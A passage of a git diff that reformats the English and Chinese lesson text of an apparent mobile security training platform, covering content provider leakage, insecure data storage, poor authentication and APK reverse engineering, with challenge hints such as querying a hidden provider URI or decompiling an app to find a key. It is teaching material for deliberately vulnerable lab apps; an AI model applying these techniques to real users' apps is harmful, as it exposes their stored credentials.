+paragraph.info.2 = In order to query a Content Provider without an App, perform the following adb commands
+paragraph.info.3 = Without knowing the URI, an attacker can do a few things to figure it out.
+
+challenge.description = The Key can be attained by querying the Content Provider. The URI is : content://com.somewhere.hidden.SecretProvider/data
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39_zh.properties b/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39_zh.properties
index f9e28b942..ce7e5a8e6 100644
--- a/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39_zh.properties
+++ b/src/main/resources/i18n/lessons/m_content_provider_leakage/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39_zh.properties
@@ -1,6 +1,9 @@
-title.question.content_provider_leak=\u4EC0\u4E48\u662F\u5185\u5BB9\u63D0\u4F9B\u8005\u6CC4\u6F0F?
-paragraph.info.1=\u4E00\u4E2A\u5185\u5BB9\u63D0\u4F9B\u5546\u662F\u5B89\u5353\u7528\u4E8E\u63D0\u4F9B\u8FDB\u5165\u5230\u5728\u4E00\u4E2A\u4E2D\u592E\u5B58\u50A8\u5E93\u4E2D\u7684\u4E00\u4E2A\u7ED3\u6784\u5316\u6570\u636E\u96C6\u7684.\u5185\u5BB9\u63D0\u4F9B\u8005\u7684\u76EE\u7684\u662F\u7531\u5176\u4ED6\u5E94\u7528\u7A0B\u5E8F\u8BBF\u95EE,\u7136\u800C,\u4F7F\u7528\u5B89\u5353\u8C03\u8BD5\u6865,\u4ED6\u4EEC\u53EF\u4EE5\u901A\u8FC7\u4EFB\u4F55\u4EBA\u8BBF\u95EE\u7684\u8BBE\u5907\u8FDB\u884C\u8BBF\u95EE.
-paragraph.info.2=\u8981\u5728\u4E0D\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u7684\u60C5\u51B5\u4E0B\u67E5\u8BE2\u4E00\u4E2A\u5185\u5BB9\u63D0\u4F9B\u8005,\u53EF\u6267\u884C\u4EE5\u4E0B adb \u547D\u4EE4
-challenge.description=\u5B8C\u6210\u8BE5\u8BFE\u7A0B\u7684\u94A5\u5319\u53EF\u4EE5\u901A\u8FC7\u67E5\u8BE2\u5185\u5BB9\u4F9B\u5E94\u5546\u83B7\u53D6. URI \u662F : content://com.somewhere.hidden.SecretProvider/data
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
+title.question.content_provider_leak = \u4EC0\u4E48\u662F\u5185\u5BB9\u63D0\u4F9B\u8005\u6CC4\u6F0F?
+
+paragraph.info.1 = \u4E00\u4E2A\u5185\u5BB9\u63D0\u4F9B\u5546\u662F\u5B89\u5353\u7528\u4E8E\u63D0\u4F9B\u8FDB\u5165\u5230\u5728\u4E00\u4E2A\u4E2D\u592E\u5B58\u50A8\u5E93\u4E2D\u7684\u4E00\u4E2A\u7ED3\u6784\u5316\u6570\u636E\u96C6\u7684.\u5185\u5BB9\u63D0\u4F9B\u8005\u7684\u76EE\u7684\u662F\u7531\u5176\u4ED6\u5E94\u7528\u7A0B\u5E8F\u8BBF\u95EE,\u7136\u800C,\u4F7F\u7528\u5B89\u5353\u8C03\u8BD5\u6865,\u4ED6\u4EEC\u53EF\u4EE5\u901A\u8FC7\u4EFB\u4F55\u4EBA\u8BBF\u95EE\u7684\u8BBE\u5907\u8FDB\u884C\u8BBF\u95EE.
+paragraph.info.2 = \u8981\u5728\u4E0D\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u7684\u60C5\u51B5\u4E0B\u67E5\u8BE2\u4E00\u4E2A\u5185\u5BB9\u63D0\u4F9B\u8005,\u53EF\u6267\u884C\u4EE5\u4E0B adb \u547D\u4EE4
+
+challenge.description = \u5B8C\u6210\u8BE5\u8BFE\u7A0B\u7684\u94A5\u5319\u53EF\u4EE5\u901A\u8FC7\u67E5\u8BE2\u5185\u5BB9\u4F9B\u5E94\u5546\u83B7\u53D6. URI \u662F : content://com.somewhere.hidden.SecretProvider/data
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.properties b/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.properties
index ec45eb8f6..46d24fd1c 100644
--- a/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.properties
+++ b/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f.properties
@@ -1,8 +1,11 @@
-title.question.m_insecure_data_storeage=What is Mobile Insecure Data Storage?
-paragraph.info.1=Insecure Data Storage occurs when an App stores sensitive data such as user credentials, API keys, Credit Card information insecurely. This issue occurs in numerous ways. Generally, for storing client side information, an App will use an Sqlite database.
-paragraph.info.2=This can be a favoured, cheaper method of storage instead of using a more expensive back end service. As a result, any user can access the data stored by the App. Insecure Data Storage becomes a danger when a user's App caches sensitive data, their phone is stolen or the attacker steals this information from local databases. Malware can also access this information easily. This risk is increased by the popularity of rooting devices which makes it much easier for an attacker to access this information.
-paragraph.info.3=There are other ways to store data insecurely. Using known broken hashing algorithms can lead to pain for the Apps users. Not only are they susceptible to collisions, where two different passwords can potentially generate the same hash and be interpreted as the same password, the developer would have to assume that their user's use strong passwords. This is generally never the case and once a hashed value has been cracked, an attacker merely needs to update their tables.
-paragraph.info.4=This method still uses no key, Therefore one could assume it is not truly encryption? Hashing algorithms are useful for comparing two different files but should not be used for storage of passwords (Unless done correctly).
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=Typically an Android app will store it's database in the /data/data/com.app.exampleApp/database/ directory. Anyone with a rooted device can access this directory. The Android App for this lesson stores it's under credentials in an SQLite database. The Admin's password is the result key to this lesson.
\ No newline at end of file
+title.question.m_insecure_data_storeage = What is Mobile Insecure Data Storage?
+
+paragraph.info.1 = Insecure Data Storage occurs when an App stores sensitive data such as user credentials, API keys, Credit Card information insecurely. This issue occurs in numerous ways. Generally, for storing client side information, an App will use an Sqlite database.
+paragraph.info.2 = This can be a favoured, cheaper method of storage instead of using a more expensive back end service. As a result, any user can access the data stored by the App. Insecure Data Storage becomes a danger when a user's App caches sensitive data, their phone is stolen or the attacker steals this information from local databases. Malware can also access this information easily. This risk is increased by the popularity of rooting devices which makes it much easier for an attacker to access this information.
+paragraph.info.3 = There are other ways to store data insecurely. Using known broken hashing algorithms can lead to pain for the Apps users. Not only are they susceptible to collisions, where two different passwords can potentially generate the same hash and be interpreted as the same password, the developer would have to assume that their user's use strong passwords. This is generally never the case and once a hashed value has been cracked, an attacker merely needs to update their tables.
+paragraph.info.4 = This method still uses no key, Therefore one could assume it is not truly encryption? Hashing algorithms are useful for comparing two different files but should not be used for storage of passwords (Unless done correctly).
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = Typically an Android app will store it's database in the /data/data/com.app.exampleApp/database/ directory. Anyone with a rooted device can access this directory. The Android App for this lesson stores it's under credentials in an SQLite database. The Admin's password is the result key to this lesson.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f_zh.properties b/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f_zh.properties
index 6293a819f..02d0d97be 100644
--- a/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f_zh.properties
+++ b/src/main/resources/i18n/lessons/m_insecure_data_storage/ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f_zh.properties
@@ -1,8 +1,11 @@
-title.question.m_insecure_data_storeage=\u4EC0\u4E48\u662F\u79FB\u52A8\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8?
-paragraph.info.1=\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u5546\u5E97\u7684\u654F\u611F\u6570\u636E\u4E0D\u5B89\u5168,\u6BD4\u5982\u7528\u6237\u51ED\u8BC1,API\u5BC6\u94A5,\u4FE1\u7528\u5361\u4FE1\u606F\u7B49.\u8FD9\u4E9B\u95EE\u9898\u51FA\u73B0\u5728\u8BB8\u591A\u4E0D\u540C\u7684\u65B9\u9762.\u901A\u5E38\u60C5\u51B5\u4E0B,\u5BF9\u4E8E\u5BA2\u6237\u7AEF\u7684\u6570\u636E\u5B58\u50A8, \u5E94\u7528\u7A0B\u5E8F\u4F1A\u4F7F\u7528 SQLite\u6570\u636E\u5E93.
-paragraph.info.2=\u8FD9\u53EF\u4EE5\u662F\u4E00\u4E2A\u53D7\u9752\u7750\u7684,\u66F4\u4FBF\u5B9C\u7684\u5B58\u50A8\u65B9\u5F0F,\u800C\u4E0D\u662F\u4F7F\u7528\u4E00\u4E2A\u66F4\u6602\u8D35\u7684\u540E\u7AEF\u670D\u52A1.\u5176\u7ED3\u679C,\u4EFB\u4F55\u7528\u6237\u90FD\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u8BBF\u95EE\u6240\u50A8\u5B58\u7684\u6570\u636E.\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8\u53D8\u5F97\u5371\u9669,\u662F\u5F53\u7528\u6237\u7684\u5E94\u7528\u7A0B\u5E8F\u7F13\u5B58\u654F\u611F\u6570\u636E,\u4ED6\u4EEC\u7684\u624B\u673A\u88AB\u5077\u6216\u8005\u653B\u51FB\u8005\u76D7\u53D6\u4E86\u4ED6\u4EEC\u7684\u4FE1\u606F\u4ECE\u672C\u5730\u6570\u636E\u5E93\u65F6.\u6076\u610F\u8F6F\u4EF6\u53EF\u4EE5\u8F7B\u6613\u5730\u8BBF\u95EE\u8FD9\u4E9B\u6570\u636E.\u8FD9\u79CD\u98CE\u9669\u7684\u589E\u52A0\u662F\u7531\u4E8E root \u8BBE\u5907\u7684\u666E\u53CA,\u8FD9\u4F7F\u5F97\u653B\u51FB\u8005\u66F4\u52A0\u5BB9\u6613\u8BBF\u95EE\u8FD9\u4E9B\u654F\u611F\u4FE1\u606F.
-paragraph.info.3=\u8FD8\u6709\u5176\u4ED6\u4E0D\u5B89\u5168\u7684\u50A8\u5B58\u6570\u636E\u7684\u65B9\u6CD5.\u5982\u4F7F\u7528\u5DF2\u77E5\u7684\u5931\u6548\u7684\u6563\u5217\u7B97\u6CD5\u53EF\u7ED9\u5E94\u7528\u7A0B\u5E8F\u7684\u7528\u6237\u5E26\u6765\u707E\u96BE.\u4E0D\u4EC5\u4EC5\u662F\u4ED6\u4EEC\u5BB9\u6613\u5F15\u8D77\u78B0\u649E,\u5F53\u4E24\u4E2A\u4E0D\u540C\u7684\u5BC6\u7801\u53EF\u4EE5\u6F5C\u5728\u5730\u4EA7\u751F\u76F8\u540C\u7684\u54C8\u5E0C\u503C\u548C\u88AB\u89E3\u91CA\u4E3A\u76F8\u540C\u7684\u5BC6\u7801,\u5F00\u53D1\u4EBA\u5458\u5C06\u5FC5\u987B\u5047\u8BBE\u4ED6\u4EEC\u7684\u7528\u6237\u4F7F\u7528\u5F3A\u7684\u5BC6\u7801. \u8FD9\u901A\u5E38\u662F\u4ECE\u6765\u6CA1\u6709\u7684\u60C5\u51B5,\u4E00\u65E6\u4E00\u4E2A\u6563\u5217\u503C\u88AB\u7834\u89E3,\u653B\u51FB\u8005\u4EC5\u4EC5\u53EA\u9700\u8981\u66F4\u65B0\u81EA\u5DF1\u7684\u8868.
-paragraph.info.4=\u6B64\u65B9\u6CD5\u7684\u4F7F\u7528\u4ECD\u7136\u6CA1\u6709\u94A5\u5319,\u56E0\u6B64\u4EBA\u4EEC\u53EF\u4EE5\u5047\u8BBE\u5B83\u4E0D\u662F\u771F\u6B63\u7684\u52A0\u5BC6? \u6563\u5217\u7B97\u6CD5\u7528\u4E8E\u6BD4\u8F83\u4E24\u4E2A\u4E0D\u540C\u7684\u6587\u4EF6\u662F\u6709\u6548\u7684,\u4F46\u662F\u4E0D\u5E94\u8BE5\u88AB\u7528\u4E8E\u5BC6\u7801\u7684\u50A8\u5B58(\u9664\u975E\u662F\u88AB\u6B63\u786E\u5B8C\u6210\u7684).
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u901A\u5E38\u60C5\u51B5\u4E0B\u4E00\u4E2AAndroid\u5E94\u7528\u7A0B\u5E8F\u5C06\u5B83\u7684\u6570\u636E\u5E93\u4FDD\u5B58\u5728/data/data/com.app.exampleApp/database/\u76EE\u5F55\u4E0B. \u4EFB\u4F55\u4EBA\u53EA\u8981\u6709\u4E00\u4E2Arooted\u8BBE\u5907\u90FD\u53EF\u4EE5\u8BBF\u95EE\u8FD9\u4E2A\u76EE\u5F55.Android\u5E94\u7528\u7A0B\u5E8F\u5728\u8BE5\u8BFE\u4E2D,\u4F7F\u7528\u51ED\u8BC1\u5C06\u6570\u636E\u5B58\u50A8\u5728\u4E00\u4E2A SQLite\u6570\u636E\u5E93\u4E0B.\u7BA1\u7406\u5458\u7684\u5BC6\u7801\u4FBF\u662F\u5B8C\u6210\u8BE5\u8BFE\u7684\u94A5\u5319.
+title.question.m_insecure_data_storeage = \u4EC0\u4E48\u662F\u79FB\u52A8\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8?
+
+paragraph.info.1 = \u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u5546\u5E97\u7684\u654F\u611F\u6570\u636E\u4E0D\u5B89\u5168,\u6BD4\u5982\u7528\u6237\u51ED\u8BC1,API\u5BC6\u94A5,\u4FE1\u7528\u5361\u4FE1\u606F\u7B49.\u8FD9\u4E9B\u95EE\u9898\u51FA\u73B0\u5728\u8BB8\u591A\u4E0D\u540C\u7684\u65B9\u9762.\u901A\u5E38\u60C5\u51B5\u4E0B,\u5BF9\u4E8E\u5BA2\u6237\u7AEF\u7684\u6570\u636E\u5B58\u50A8, \u5E94\u7528\u7A0B\u5E8F\u4F1A\u4F7F\u7528 SQLite\u6570\u636E\u5E93.
+paragraph.info.2 = \u8FD9\u53EF\u4EE5\u662F\u4E00\u4E2A\u53D7\u9752\u7750\u7684,\u66F4\u4FBF\u5B9C\u7684\u5B58\u50A8\u65B9\u5F0F,\u800C\u4E0D\u662F\u4F7F\u7528\u4E00\u4E2A\u66F4\u6602\u8D35\u7684\u540E\u7AEF\u670D\u52A1.\u5176\u7ED3\u679C,\u4EFB\u4F55\u7528\u6237\u90FD\u53EF\u4EE5\u901A\u8FC7\u5E94\u7528\u7A0B\u5E8F\u8BBF\u95EE\u6240\u50A8\u5B58\u7684\u6570\u636E.\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8\u53D8\u5F97\u5371\u9669,\u662F\u5F53\u7528\u6237\u7684\u5E94\u7528\u7A0B\u5E8F\u7F13\u5B58\u654F\u611F\u6570\u636E,\u4ED6\u4EEC\u7684\u624B\u673A\u88AB\u5077\u6216\u8005\u653B\u51FB\u8005\u76D7\u53D6\u4E86\u4ED6\u4EEC\u7684\u4FE1\u606F\u4ECE\u672C\u5730\u6570\u636E\u5E93\u65F6.\u6076\u610F\u8F6F\u4EF6\u53EF\u4EE5\u8F7B\u6613\u5730\u8BBF\u95EE\u8FD9\u4E9B\u6570\u636E.\u8FD9\u79CD\u98CE\u9669\u7684\u589E\u52A0\u662F\u7531\u4E8E root \u8BBE\u5907\u7684\u666E\u53CA,\u8FD9\u4F7F\u5F97\u653B\u51FB\u8005\u66F4\u52A0\u5BB9\u6613\u8BBF\u95EE\u8FD9\u4E9B\u654F\u611F\u4FE1\u606F.
+paragraph.info.3 = \u8FD8\u6709\u5176\u4ED6\u4E0D\u5B89\u5168\u7684\u50A8\u5B58\u6570\u636E\u7684\u65B9\u6CD5.\u5982\u4F7F\u7528\u5DF2\u77E5\u7684\u5931\u6548\u7684\u6563\u5217\u7B97\u6CD5\u53EF\u7ED9\u5E94\u7528\u7A0B\u5E8F\u7684\u7528\u6237\u5E26\u6765\u707E\u96BE.\u4E0D\u4EC5\u4EC5\u662F\u4ED6\u4EEC\u5BB9\u6613\u5F15\u8D77\u78B0\u649E,\u5F53\u4E24\u4E2A\u4E0D\u540C\u7684\u5BC6\u7801\u53EF\u4EE5\u6F5C\u5728\u5730\u4EA7\u751F\u76F8\u540C\u7684\u54C8\u5E0C\u503C\u548C\u88AB\u89E3\u91CA\u4E3A\u76F8\u540C\u7684\u5BC6\u7801,\u5F00\u53D1\u4EBA\u5458\u5C06\u5FC5\u987B\u5047\u8BBE\u4ED6\u4EEC\u7684\u7528\u6237\u4F7F\u7528\u5F3A\u7684\u5BC6\u7801. \u8FD9\u901A\u5E38\u662F\u4ECE\u6765\u6CA1\u6709\u7684\u60C5\u51B5,\u4E00\u65E6\u4E00\u4E2A\u6563\u5217\u503C\u88AB\u7834\u89E3,\u653B\u51FB\u8005\u4EC5\u4EC5\u53EA\u9700\u8981\u66F4\u65B0\u81EA\u5DF1\u7684\u8868.
+paragraph.info.4 = \u6B64\u65B9\u6CD5\u7684\u4F7F\u7528\u4ECD\u7136\u6CA1\u6709\u94A5\u5319,\u56E0\u6B64\u4EBA\u4EEC\u53EF\u4EE5\u5047\u8BBE\u5B83\u4E0D\u662F\u771F\u6B63\u7684\u52A0\u5BC6? \u6563\u5217\u7B97\u6CD5\u7528\u4E8E\u6BD4\u8F83\u4E24\u4E2A\u4E0D\u540C\u7684\u6587\u4EF6\u662F\u6709\u6548\u7684,\u4F46\u662F\u4E0D\u5E94\u8BE5\u88AB\u7528\u4E8E\u5BC6\u7801\u7684\u50A8\u5B58(\u9664\u975E\u662F\u88AB\u6B63\u786E\u5B8C\u6210\u7684).
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u901A\u5E38\u60C5\u51B5\u4E0B\u4E00\u4E2AAndroid\u5E94\u7528\u7A0B\u5E8F\u5C06\u5B83\u7684\u6570\u636E\u5E93\u4FDD\u5B58\u5728/data/data/com.app.exampleApp/database/\u76EE\u5F55\u4E0B. \u4EFB\u4F55\u4EBA\u53EA\u8981\u6709\u4E00\u4E2Arooted\u8BBE\u5907\u90FD\u53EF\u4EE5\u8BBF\u95EE\u8FD9\u4E2A\u76EE\u5F55.Android\u5E94\u7528\u7A0B\u5E8F\u5728\u8BE5\u8BFE\u4E2D,\u4F7F\u7528\u51ED\u8BC1\u5C06\u6570\u636E\u5B58\u50A8\u5728\u4E00\u4E2A SQLite\u6570\u636E\u5E93\u4E0B.\u7BA1\u7406\u5458\u7684\u5BC6\u7801\u4FBF\u662F\u5B8C\u6210\u8BE5\u8BFE\u7684\u94A5\u5319.
diff --git a/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.properties b/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.properties
index ee64ca485..9d6f9985d 100644
--- a/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.properties
+++ b/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.properties
@@ -1,4 +1,6 @@
-title.question.m_poor_authentication=What is Poor Authentication?
-paragraph.info=Poor Authentication is an issue which occurs when an App relies on an authentication method which is insecure. This can come in many different forms. One such example is password reset functions, which although convenient, can compromise the authentication process. In this app, we don't need to know the password as a rest function is available to us. Secondly, the App is leaking logs of what the user has typed during previous uses of the App. This information will provide you with the data you need to reset the password and get the key. Authentication is validating that a user is who they say they are. Authorization is validating that a user has access to a given resource. (such as an Admin privilege.)
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
\ No newline at end of file
+title.question.m_poor_authentication = What is Poor Authentication?
+
+paragraph.info = Poor Authentication is an issue which occurs when an App relies on an authentication method which is insecure. This can come in many different forms. One such example is password reset functions, which although convenient, can compromise the authentication process. In this app, we don't need to know the password as a rest function is available to us. Secondly, the App is leaking logs of what the user has typed during previous uses of the App. This information will provide you with the data you need to reset the password and get the key. Authentication is validating that a user is who they say they are. Authorization is validating that a user has access to a given resource. (such as an Admin privilege.)
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e_zh.properties b/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e_zh.properties
index fd5988a24..16f92c5d7 100644
--- a/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e_zh.properties
+++ b/src/main/resources/i18n/lessons/m_poor_authentication/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e_zh.properties
@@ -1,4 +1,6 @@
-title.question.m_poor_authentication=\u4EC0\u4E48\u662F\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1?
-paragraph.info=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u95EE\u9898\u662F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u4F9D\u8D56\u4E8E\u4E00\u4E2A\u4E0D\u5B89\u5168\u7684\u8BA4\u8BC1\u65B9\u5F0F.\u8FD9\u53EF\u4EE5\u6709\u8BB8\u591A\u4E0D\u540C\u7684\u5F62\u5F0F.\u5176\u4E2D\u4E00\u4E2A\u4F8B\u5B50\u5C31\u662F\u5BC6\u7801\u91CD\u7F6E\u529F\u80FD,\u867D\u7136\u65B9\u4FBF,\u5374\u53EF\u4EE5\u6CC4\u6F0F\u8BA4\u8BC1\u7684\u8FC7\u7A0B.\u5728\u8FD9\u4E2A\u7A0B\u5E8F\u4E2D,\u6211\u4EEC\u4E0D\u9700\u8981\u77E5\u9053\u5BC6\u7801\u4F5C\u4E3A\u91CD\u7F6E\u8FD9\u4E2A\u529F\u80FD\u4E8E\u6211\u4EEC\u662F\u53EF\u7528\u7684.\u5176\u6B21,\u8FD9\u4E2A\u7A0B\u5E8F\u6B63\u5728\u6CC4\u6F0F\u7528\u6237\u5728\u5148\u524D\u4F7F\u7528\u7A0B\u5E8F\u4E2D\u5DF2\u7ECF\u952E\u5165\u7684\u4FE1\u606F\u7684\u65E5\u5FD7.\u8FD9\u4E9B\u4FE1\u606F\u5C06\u63D0\u4F9B\u7ED9\u4F60\u6240\u9700\u8981\u91CD\u7F6E\u5BC6\u7801\u548C\u83B7\u5F97\u94A5\u5319\u7684\u6570\u636E.\u8EAB\u4EFD\u8BA4\u8BC1\u662F\u9A8C\u8BC1\u4E00\u4E2A\u7528\u6237\u8BF4\u4ED6\u662F\u8C01.\u6388\u6743\u662F\u9A8C\u8BC1\u7528\u6237\u5177\u6709\u8BBF\u95EE\u7ED9\u5B9A\u7684\u8D44\u6E90\u7684\u6743\u5229 (\u4F8B\u5982\u7BA1\u7406\u5458\u7279\u6743).
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
+title.question.m_poor_authentication = \u4EC0\u4E48\u662F\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1?
+
+paragraph.info = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u95EE\u9898\u662F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u4F9D\u8D56\u4E8E\u4E00\u4E2A\u4E0D\u5B89\u5168\u7684\u8BA4\u8BC1\u65B9\u5F0F.\u8FD9\u53EF\u4EE5\u6709\u8BB8\u591A\u4E0D\u540C\u7684\u5F62\u5F0F.\u5176\u4E2D\u4E00\u4E2A\u4F8B\u5B50\u5C31\u662F\u5BC6\u7801\u91CD\u7F6E\u529F\u80FD,\u867D\u7136\u65B9\u4FBF,\u5374\u53EF\u4EE5\u6CC4\u6F0F\u8BA4\u8BC1\u7684\u8FC7\u7A0B.\u5728\u8FD9\u4E2A\u7A0B\u5E8F\u4E2D,\u6211\u4EEC\u4E0D\u9700\u8981\u77E5\u9053\u5BC6\u7801\u4F5C\u4E3A\u91CD\u7F6E\u8FD9\u4E2A\u529F\u80FD\u4E8E\u6211\u4EEC\u662F\u53EF\u7528\u7684.\u5176\u6B21,\u8FD9\u4E2A\u7A0B\u5E8F\u6B63\u5728\u6CC4\u6F0F\u7528\u6237\u5728\u5148\u524D\u4F7F\u7528\u7A0B\u5E8F\u4E2D\u5DF2\u7ECF\u952E\u5165\u7684\u4FE1\u606F\u7684\u65E5\u5FD7.\u8FD9\u4E9B\u4FE1\u606F\u5C06\u63D0\u4F9B\u7ED9\u4F60\u6240\u9700\u8981\u91CD\u7F6E\u5BC6\u7801\u548C\u83B7\u5F97\u94A5\u5319\u7684\u6570\u636E.\u8EAB\u4EFD\u8BA4\u8BC1\u662F\u9A8C\u8BC1\u4E00\u4E2A\u7528\u6237\u8BF4\u4ED6\u662F\u8C01.\u6388\u6743\u662F\u9A8C\u8BC1\u7528\u6237\u5177\u6709\u8BBF\u95EE\u7ED9\u5B9A\u7684\u8D44\u6E90\u7684\u6743\u5229 (\u4F8B\u5982\u7BA1\u7406\u5458\u7279\u6743).
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.properties b/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.properties
index b5e01fad0..e98313e4c 100644
--- a/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.properties
+++ b/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.properties
@@ -1,7 +1,10 @@
-title.question.m_reverse_engineering=What is Mobile Reverse Engineering?
-paragraph.info.1=One of the biggest dangers to Mobile Applications is reverse engineering. This is easily done and can reveal source code, API keys, Encryption Keys, Hidden Admin Functionality or hard coded passwords. A developer may obfuscate their code in order to make it more difficult for an attacker to read. In some cases obfuscation is the only defense.
-paragraph.info.2=ProGuard is a tool which now comes with the Android SDK and can be used to optimize, shrink and obfuscate code. Obfuscation makes the code harder to read for anyone who reverse engineers the APK. Although ProGuard is an excellent tool, it will not secure your code. ProGuard should generally be used all the time due to the other benefits it offers, but it will only slow down an attacker from gathering information and cannot prevent attackers from finding sensitive information.
-paragraph.info.3=Other obfuscation techniques involve not only making the code harder to read but also making the code more confusing. Instead of a hard coded string comparison, an App could use a function to check to validity of a password.
-challenge.description=There are two tools you will need to reverse engineer an APK. Dex2Jar and JD-GUI. Once you have these tools and the target APK, use dex2jar to convert the APK to a jar file then open the .jar file with JD-GUI. Carry this out against the app for this lesson and investigate the source code to retrieve the result key.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
\ No newline at end of file
+title.question.m_reverse_engineering = What is Mobile Reverse Engineering?
+
+paragraph.info.1 = One of the biggest dangers to Mobile Applications is reverse engineering. This is easily done and can reveal source code, API keys, Encryption Keys, Hidden Admin Functionality or hard coded passwords. A developer may obfuscate their code in order to make it more difficult for an attacker to read. In some cases obfuscation is the only defense.
+paragraph.info.2 = ProGuard is a tool which now comes with the Android SDK and can be used to optimize, shrink and obfuscate code. Obfuscation makes the code harder to read for anyone who reverse engineers the APK. Although ProGuard is an excellent tool, it will not secure your code. ProGuard should generally be used all the time due to the other benefits it offers, but it will only slow down an attacker from gathering information and cannot prevent attackers from finding sensitive information.
+paragraph.info.3 = Other obfuscation techniques involve not only making the code harder to read but also making the code more confusing. Instead of a hard coded string comparison, an App could use a function to check to validity of a password.
+
+challenge.description = There are two tools you will need to reverse engineer an APK. Dex2Jar and JD-GUI. Once you have these tools and the target APK, use dex2jar to convert the APK to a jar file then open the .jar file with JD-GUI. Carry this out against the app for this lesson and investigate the source code to retrieve the result key.
+
+button.hideIntro = Hide Lesson Introduction
